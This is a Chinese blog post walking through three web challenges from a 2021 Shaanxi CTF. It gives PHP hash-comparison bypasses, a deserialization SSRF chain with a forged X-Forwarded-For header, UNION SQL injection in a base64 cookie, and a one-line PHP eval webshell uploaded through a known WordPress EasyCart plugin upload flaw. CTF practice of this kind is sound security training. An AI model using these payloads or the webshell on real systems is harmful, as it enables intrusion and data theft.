CTF2021陕西wp-web-ez_checkin

已于 2023-07-12 01:13:13 修改
阅读量341 收藏
点赞数 1
文章标签: 其他
于 2023-07-02 01:42:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45090021/article/details/131496583
版权

进入题目空白一片首先老套路第一直接f12无果、查看源代码无果、该看的都看了没留下什么痕迹那就是直接扫描目录。

 扫出来4个目录逐个点开在index.php~发现线索

 代码审计

if (isset($_GET["param1"]))
    if ($_GET["param1"] == hash("md4", $_GET["param1"]))

通过对比md5的漏洞分析PHP在处理科学计数法的时候如果是0exxx会当成0,所以如果一个数字是0exxx它经过md4最后也是0exxx,那么他们就(==弱等于),在这里需要说明一下0e后面必须是数字才能实现(==弱等于)。“0e251288019”和“0e898201062”都可以绕过,还要说明一下是is_numeric()函数有漏洞,当数字里面有e的话is_numeric()函数会当成xxx*10^xxx相当于科学计数法。

所以得出param1=0e251288019

if (isset($_GET['param2']) && isset($_GET['param3']))

{ if ($_GET['param2'] != $_GET['param3'] &&md5($_GET['param2'])==md5(md5($_GET['param3'])))

双md5加密,一个值的md5后再md5要与另外一个值一样,可以输入param3随便给个值,然后param2为param3的md5值就行。

然后得出prarma2=e9510081ac30ffa83f10b68cde1cac07&parama3=6666

 if(isset($_GET['param4']) && isset($_GET['param5'])){
 if($_GET['param4'] != $_GET['param5']  &&  md5($_GET['param4'])===md5($_GET['param5'])){
echo $flag;

最后一个是MD5强等于类型前面两个是MD5弱类型

弱类型:两个MD5的值一样就可以不要求类型一样

强等于:两个MD5的数据必须是同一类型比如说prarma2=e9510081ac30ffa83f10b68cde1cac07&parama3=6666这个的值一个是数值一个是字母不是同一类型不能进行绕过,然后可以使用数组绕过

prarma4[]=1&parama5[]=2

最后得出

?param1=0e251288019&param2=e9510081ac30ffa83f10b68cde1cac07&param3=6666&param4[]=1&param5[]=2

EzPHP

打开直接代码审计 

首先看到最后一段是用d来传参进行反序列化然后看到wakeup函数先进行过滤过滤内容为不允许http://127.0.0.1/、http://localhost/链接,以及不允许使用file协议以及dict协议,并且要求类成员变量UserAgent值为‘DAOKOUSHAOJI’

然后现在得出线索是不允许直接使用本地ip127.0.0.1访问。第二个线索是UserAgent值必须要等于‘DAOKOUSHAOJI’,然后直接写php序列化脚本

<?php
class Chrome
{
    private $url;
    private $UserAgent;
    private $xff;
    private $Cookie;
    public function __construct()
    {
        $this->url       = "http://127.0.0.1:1000";#由于不能直接用127.0.0.1访问可以添加端口进行绕过。
        $this->UserAgent = "DAOKOUSHAOJI";

    }
}
$d = new Chrome();
echo urlencode(serialize($d));
#正常序列化得出结果是:O:6:"Chrome":4:{s:11:" Chrome url";s:21:"http://127.0.0.1:1000";s:17:" Chrome UserAgent";s:12:"DAOKOUSHAOJI";s:11:" Chrome xff";N;s:14:" Chrome Cookie";N;}
#经过url编码得出的结果是:O%3A6%3A%22Chrome%22%3A4%3A%7Bs%3A11%3A%22%00Chrome%00url%22%3Bs%3A21%3A%22http%3A%2F%2F127.0.0.1%3A1000%22%3Bs%3A17%3A%22%00Chrome%00UserAgent%22%3Bs%3A12%3A%22DAOKOUSHAOJI%22%3Bs%3A11%3A%22%00Chrome%00xff%22%3BN%3Bs%3A14%3A%22%00Chrome%00Cookie%22%3BN%3B%7D

正常输入反序列化会出现以下,所以要进行url编码进行绕过

用URL进行传参回显了一个null空,说明进入的127.0.0.1:1000的端口不对,那就直接上bp进行爆破端口

选择要爆破的地方,直接选择1000那个地方先按Audo然后在选中1000按add 

设置爆破从1000到9999端口

 爆出1234端口与其他端口不一样直接继续序列化访问1234端口

<?php
class Chrome
{
    private $url;
    private $UserAgent;
    private $xff;
    private $Cookie;
    public function __construct()
    {
        $this->url = "http://127.0.0.1:1234";#填上刚刚爆出的端口1234。
        $this->UserAgent = "DAOKOUSHAOJI";


    }
}
$d = new Chrome();
echo urlencode(serialize($d));
#运行结果:O%3A6%3A%22Chrome%22%3A4%3A%7Bs%3A11%3A%22%00Chrome%00url%22%3Bs%3A21%3A%22http%3A%2F%2F127.0.0.1%3A1234%22%3Bs%3A17%3A%22%00Chrome%00UserAgent%22%3Bs%3A12%3A%22DAOKOUSHAOJI%22%3Bs%3A11%3A%22%00Chrome%00xff%22%3BN%3Bs%3A14%3A%22%00Chrome%00Cookie%22%3BN%3B%7D

提示不是本地用户

然后可以用xff伪造本地用户继续序列化

<?php
class Chrome
{
    private $url;
    private $UserAgent;
    private $xff;
    private $Cookie;
    public function __construct()
    {
        $this->url = "http://127.0.0.1:1234";#填上刚刚爆出的端口1234。
        $this->UserAgent = "DAOKOUSHAOJI";
        $this->xff = "127.0.0.1";#伪造本地用户


    }
}
$d = new Chrome();
echo urlencode(serialize($d));
#运行结果:
O%3A6%3A%22Chrome%22%3A4%3A%7Bs%3A11%3A%22%00Chrome%00url%22%3Bs%3A21%3A%22http%3A%2F%2F127.0.0.1%3A1234%22%3Bs%3A17%3A%22%00Chrome%00UserAgent%22%3Bs%3A12%3A%22DAOKOUSHAOJI%22%3Bs%3A11%3A%22%00Chrome%00xff%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A14%3A%22%00Chrome%00Cookie%22%3BN%3B%7D

此时可以看到页面显示了用户名可Number,类定义时有个cookie参数,可以猜测是通过cookie查询数据库中当前用户的信息

且用户为guest时,通目代码构造函数中$this->Cookie="uname=Z3Vlc3Q=";

发现了cookie的格式参数为uname,然后直接猜最正常的用户值为uname=admin(base64)

 继续序列化

<?php
class Chrome
{
    private $url;
    private $UserAgent;
    private $xff;
    private $Cookie;
    public function __construct()
    {
        $this->url = "http://127.0.0.1:1234";#填上刚刚爆出的端口1234。
        $this->UserAgent = "DAOKOUSHAOJI";
        $this->xff = "127.0.0.1";#伪造本地用户
        $this->Cookie="uname=YWRtaW4=";#admin


    }
}
$d = new Chrome();
echo urlencode(serialize($d));
#运行结果:O%3A6%3A%22Chrome%22%3A4%3A%7Bs%3A11%3A%22%00Chrome%00url%22%3Bs%3A21%3A%22http%3A%2F%2F127.0.0.1%3A1234%22%3Bs%3A17%3A%22%00Chrome%00UserAgent%22%3Bs%3A12%3A%22DAOKOUSHAOJI%22%3Bs%3A11%3A%22%00Chrome%00xff%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A14%3A%22%00Chrome%00Cookie%22%3Bs%3A14%3A%22uname%3DYWRtaW4%3D%22%3B%7D

 进入了管理界面,看看是否存在sql注入,

直接输入admin' 转base64

<?php
class Chrome
{
    private $url;
    private $UserAgent;
    private $xff;
    private $Cookie;

    public function __construct()
    {
        $this->url = 'http://127.0.0.1:1234';#爆出的端口1234
        $this->UserAgent ='DAOKOUSHAOJI';#要求输入的用户
        $this->xff ='127.0.0.1';#伪造本地登录
        $this->Cookie ="uname=YWRtaW4n";#admin'
    }
}
$w = new Chrome();
echo urlencode(serialize($w));
#运行结果:O%3A6%3A%22Chrome%22%3A4%3A%7Bs%3A11%3A%22%00Chrome%00url%22%3Bs%3A21%3A%22http%3A%2F%2F127.0.0.1%3A1234%22%3Bs%3A17%3A%22%00Chrome%00UserAgent%22%3Bs%3A12%3A%22DAOKOUSHAOJI%22%3Bs%3A11%3A%22%00Chrome%00xff%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A14%3A%22%00Chrome%00Cookie%22%3Bs%3A14%3A%22uname%3DYWRtaW4n%22%3B%7D

,直接出现了sql数据报错信息,说明是可以进行sql注入的。

然后正常的查库查表都不显示。查列的时候才有回响

 查库显示错误

查列 admin' order by 3 # 直接从第三列开始查,直到查到 admin' order by 5 # 的时候回显报错说明只有4列

 

 直接开查 admin' union select 1,flag,3,4 from flag #

没反应,通过大佬的wp才知道要去n才能进行查询 admi' union select 1,flag,3,4 from flag # 

最终的序列化

<?php
class Chrome
{
    private $url;
    private $UserAgent;
    private $xff;
    private $Cookie;

    public function __construct()
    {
        $this->url = 'http://127.0.0.1:1234';#爆出的端口1234
        $this->UserAgent ='DAOKOUSHAOJI';#要求输入的用户
        $this->xff ='127.0.0.1';#伪造本地登录
        $this->Cookie ="uname=YWRtaScgdW5pb24gc2VsZWN0IDEsZmxhZywzLDQgZnJvbSBmbGFnICM=";
                        #admi' union select 1,flag,3,4 from flag #
    }
}
$w = new Chrome();
echo urlencode(serialize($w));
#运行结果:O%3A6%3A%22Chrome%22%3A4%3A%7Bs%3A11%3A%22%00Chrome%00url%22%3Bs%3A21%3A%22http%3A%2F%2F127.0.0.1%3A1234%22%3Bs%3A17%3A%22%00Chrome%00UserAgent%22%3Bs%3A12%3A%22DAOKOUSHAOJI%22%3Bs%3A11%3A%22%00Chrome%00xff%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A14%3A%22%00Chrome%00Cookie%22%3Bs%3A62%3A%22uname%3DYWRtaScgdW5pb24gc2VsZWN0IDEsZmxhZywzLDQgZnJvbSBmbGFnICM%3D%22%3B%7D

直接出flag 

screw

进入题目首先老套路第一直接f12无果、查看源代码无果、该看的都看了没留下什么痕迹那就是直接扫描目录。

 扫出一大堆然后挑出了一个两个有用的页面一个是登录页面一个是提示页面

 

 flag.php界面

 登录界面,尝试注册账号但是只有找回密码没有注册账号直接返回主界面

发现通过aaa试看看是不是用户名,直接搞上bp爆破密码

先按clear清空所有然后再选中pwd里面的1234直接按add添加爆破

直接添加字典开爆。我这里用的是简单弱口令。

 爆出了a123456密码

 

直接登录进来啥也没有

然后通过在flag.php里面的提示说可以通过插件进行下一步,然后通过网上了解了一个购物插件的漏WordPress插件购物车3.0.4 - 不受限制的任意文件上传 - PHP网络应用程序漏洞利用 (exploit-db.com)

 直接复制粘贴代码改一下链接保存为html文件保存

<form action="http://9630e303.clsadp.com/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">
    <input type="hidden" name="datemd5" value="1">
    <input type="file" name="Filedata">
    <input value="Upload!" type="submit">
</form>
#http://9630e303.clsadp.com 这个链接是环境链接

保存好之后一定要一直登录界面在点开保存好的插件漏洞代码,不然上传不上去

 直接上传一句话木马

<?php

@eval($_POST['123']);

?>

 上传成功后上传的马在

http://环境地址/wp-content/plugins/wp-easycart/products/banners/

这个地方

直接用工具连接,进入看到flag被加密了,加密的方式是screw,然后直接找screw.so这个文件

 直接点虚拟终端进入liunx界面找

 在liunx界面下输入 find / | grep screw.so,回显位置在/usr/lib/php5/20121212/php_screw.so

 直接去路径显示错误因为这是一个文件不是文件夹

 返回下一层/usr/lib/php5/20121212/直接下载文件拖进IDA找秘钥也把flag.php下载下来备用

 

 一般秘钥都在这个位置_pm9screw_ext_fopen

 直接按F5进入编译界面双击黄色的地方

 进入到这个界面在双击黄色的地方

 这个地方就是秘钥

 这些是按照大佬的方法找到了秘钥但是本人不会用php screw 破解 然后再网上找了个python的脚本破解https://github.com/Slzdude/php_screw-decrypt

下载好直接用

先把flag.php拖进文件夹里

 直接python decode_screw.py flag.php即可

 运行完之后会多了个flag.php.bak不用管直接把flag.php改为flag.txt查看即可出flag

 

꯭百꯭事꯭可꯭乐꯭
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
EzCheckInSchool:完美校园自动打卡一天三次校内版
03-16
EzCheckInSchool 完美校园自动打卡一天三次校内版。 使用方法 首先,点击右上角Star&Fork, 接下来抓包完美校园打卡内容,此处使用Fiddler代理手机抓包 fiddler没有手机客户端,都是安装在PC上,要实现对手机上的程序抓包,则需要对PC上的fiddler和手机端做一些配置。步骤如下: 设置好手机代理后,打开完美校园开始健康打卡(最好在指定的打卡时间打卡方便抓包),目标数据包为POST到https://reportedh5.17wanxiao.com/sass/api/epmpics的JSON格式如下: { "businessType": "epmpics", "method": "submitUpInfoSchool", "jsonData": { "deptStr": { "deptid": xxxx, "text": "x学院-xx-
墨者靶场 WordPress插件漏洞分析溯源
永远是少年
12-30 1341
今天继续给大家介绍CTF刷题,本文主要内容墨者靶场 WordPress插件漏洞分析溯源。 一、题目简介 二、解题实战
DubheCTF 2024 misc方向部分题解
最新发布
Rick66Ashley的博客
03-18 516
出题的水平真的挺高的,好难……
青少年CTF Crypto-Easy CheckIn WP
weixin_55265137的博客
10-11 380
青少年CTF Crypto-Easy CheckIn WP
【CTF | 网络安全】攻防世界 command_execution 解题详析
等风来
05-21 5380
[CTF/网络安全] 攻防世界 command_execution 解题详析
2021CTF工业信息安全技能大赛-异常的s7comm
qq_43264813的博客
07-05 3074
2021CTF工业信息安全技能大赛-异常的s7comm 工程师小夏在针对西门子300PLC设备不定期的停止运行,发现设备存在异常外联控制,再对审计设备进行分析中发现数据包中存在异常的eth.trailer、eth.fcs,请您帮助小夏找到外联地址并发送异常的HEX,对服务器返回的HEX进行解密。flag格式为:flag{}。 使用工具:Wireshark、NetCat、TEA加密/解密、CaptfEncoder、科来网络分析系统 11 技术交流版、NMAP 解题步骤: 1.1、对数据包进行重放发现400、4
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
2021-10-12T15_39_04.258808+00_00airportSniffgIm17m.cap.zip
11-07
wifi破解——近源攻击 近源攻击,在攻防演练期间,攻击队队员使用无人机悬停监听技术,成功抓取到了某核电办公网络的Wifi握手包,现在正在进行紧张的破解,你能破解该密码吗? 据得到的信息显示,该办公室设置的密码...
CtfHub-wpweb
01-23
ctfhub平台webwp
2021-10-12T15_37_51.610646+00_00rizhifenxi.rar
11-09
CTF附件题,核电站新来的运维小王粗心把一个办公网地址映射到外网,遭到大量攻击,你能从日志当中找到有效信息吗。
2021-10-12T15_45_05.726396+00_00iec.zip
11-13
CTF流量分析题——支离破碎的数据
2021-AFCTF
unexpectedthing的博客
04-17 2883
AFCTF search 考点 就是一个对find的命令了解,参数exec可以实现命令 wp payload /search.php?search=flag -exec cat {} \; google authenticator 考点 sql注入,拿到secret的密钥 google身份验证码的实现 蚁剑连接,无权限,进行信息收集 蚁剑反弹shell到vps 非交互式shell变为交互式shell的两种方式 写定时任务redis提权 wp 看到登录界面,扫一波,没有东西 尝试进行sql注入 先来个万
CTF-命令执行
Luodehahajiang的博客
07-03 1513
ctf 命令执行 命令执行函数 命令执行绕过方法
2023第三届陕西省CTF--职业院校组 部分WP
Fab1an的博客
06-08 455
直接 在URL后面用GET传参?file:///flag
CTF 学习笔记
梁辰兴的博客
10-06 4341
CTF起源于1996年DEFCON全球黑客大会,以替代之前黑客们通过互相发起真实攻击进行技术比拼的方式。WordPress是利用PHP开发的博客平台,用户可以在支持PHP和MySQL数据库的服务上架设属于自己的网站。也可以把WordPress当做一个内容管理系统(CMS)来使用。WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的,用户可以在支持PHP和MySQL数据库的服务器上使用自己的博客。
ctf (easy_md5)
Glacier_Mount的博客
08-07 1133
简单的md5()函数 php弱等于和强等于
ctfshow新手杯-[easy-eval]
weixin_52116519的博客
10-11 843
【代码】ctfshow新手杯-[easy-eval]
MD5算法
m0_37925407的博客
11-18 746
应用: 用于密码管理 当我们需要保存某些密码信息以用于身份确认时,如果直接将密码信息以明码方式保存在数据库中,不使用任何保密措施,系统管理员就很容易能得到原来的密码信息,这些信息一旦泄露, 密码也很容易被破译。为了增加安全性,有必要对数据库中需要保密的信息进行加密,这样,即使有人得到了整个数据库,如果没有解密算法,也不能得到原来的密码信息。MD5算法可以很好地解决这个问题,因为它可以将任意长度的输入串经过计算得到固定长度的输出,而且只有在明文相同的情况下,才能等到相同的密文,并且这个算法是不可逆的,即便
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过来绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值